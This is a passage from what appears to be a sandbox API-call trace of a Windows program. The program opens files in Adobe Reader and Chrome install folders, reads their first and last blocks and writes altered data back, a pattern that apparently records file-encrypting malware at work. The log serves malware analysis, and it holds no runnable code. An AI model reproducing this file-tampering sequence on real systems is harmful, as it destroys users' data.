10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\UKRAINE.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\ukraine.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.418] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.418] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x121a [0114.418] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.418] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.418] ReleaseMutex (hMutex=0x168) returned 1 [0114.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UKRAINE.TXT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UKRAINE.TXT", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UKRAINE.TXT", lpUsedDefaultChar=0x0) returned 11 [0114.418] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x121a, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2b1f2bc*=0x121a, lpOverlapped=0x0) returned 1 [0114.425] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0114.425] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x17a2, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2b1f2d0*=0x17a2, lpOverlapped=0x0) returned 1 [0114.425] CloseHandle (hObject=0x1cc) returned 1 [0114.426] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1257.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1257.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.427] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.427] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x252c [0114.427] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.427] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.427] ReleaseMutex (hMutex=0x168) returned 1 [0114.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1257.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1257.TXT", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1257.TXT", lpUsedDefaultChar=0x0) returned 10 [0114.427] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.452] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x152c [0114.452] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.459] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x152c [0114.460] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.460] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0114.460] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea99e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.460] CloseHandle (hObject=0x1cc) returned 1 [0114.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.475] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst", lpFilePart=0x2b1f690*="1028.mst") returned 0x64 [0114.475] GetLastError () returned 0x5 [0114.475] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0114.476] LocalFree (hMem=0x69e2b0) returned 0x0 [0114.476] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0114.476] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0114.477] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.477] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.477] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1028.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1028.mst")) returned 0x21 [0114.478] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.484] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst", lpFilePart=0x2b1f690*="1038.mst") returned 0x64 [0114.484] GetLastError () returned 0x5 [0114.484] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0114.484] LocalFree (hMem=0x69e2b0) returned 0x0 [0114.484] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0114.484] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0114.484] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.484] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.484] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1038.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1038.mst")) returned 0x21 [0114.485] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.489] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst", lpFilePart=0x2b1f690*="1048.mst") returned 0x64 [0114.489] GetLastError () returned 0x5 [0114.489] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0114.489] LocalFree (hMem=0x69e2b0) returned 0x0 [0114.489] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0114.489] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0114.490] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.490] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.490] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1048.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1048.mst")) returned 0x21 [0114.491] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.495] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst", lpFilePart=0x2b1f690*="1069.mst") returned 0x64 [0114.495] GetLastError () returned 0x5 [0114.495] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0114.495] LocalFree (hMem=0x69e2b0) returned 0x0 [0114.495] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0114.495] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0114.496] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.496] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0114.496] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1069.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1069.mst")) returned 0x21 [0114.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Viktig.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\viktig.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x41b2 [0114.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.498] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.498] ReleaseMutex (hMutex=0x168) returned 1 [0114.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Viktig.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Viktig.htm", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Viktig.htm", lpUsedDefaultChar=0x0) returned 10 [0114.499] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e953d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.828] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x31b2 [0114.828] ReadFile (in: hFile=0x1cc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.835] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x31b2 [0114.836] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.836] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0114.836] WriteFile (in: hFile=0x1cc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.836] CloseHandle (hObject=0x1cc) returned 1 [0114.837] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x57f [0114.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.840] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.840] ReleaseMutex (hMutex=0x168) returned 1 [0114.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_child.dll.sig", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome_child.dll.sig", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome_child.dll.sig", lpUsedDefaultChar=0x0) returned 20 [0114.840] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x57f, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x57f, lpOverlapped=0x0) returned 1 [0114.946] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0114.946] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867cb8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867cb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xb07, lpOverlapped=0x0) returned 1 [0114.946] CloseHandle (hObject=0x1cc) returned 1 [0114.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrmstp.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\chrmstp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0114.948] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.948] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a3f58 [0114.948] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0114.948] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.948] ReleaseMutex (hMutex=0x168) returned 1 [0114.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrmstp.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.948] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrmstp.exe", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrmstp.exe", lpUsedDefaultChar=0x0) returned 11 [0114.948] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.979] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a2f58 [0115.012] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.036] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a2f58 [0115.038] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.039] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0115.039] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.039] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.039] CloseHandle (hObject=0x1cc) returned 1 [0115.040] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0115.040] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.040] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x494f8 [0115.041] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0115.041] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.041] ReleaseMutex (hMutex=0x168) returned 1 [0115.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="da.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0115.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="da.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="da.pak", lpUsedDefaultChar=0x0) returned 6 [0115.041] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.045] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x484f8 [0115.045] ReadFile (in: hFile=0x1cc, lpBuffer=0x2668898, 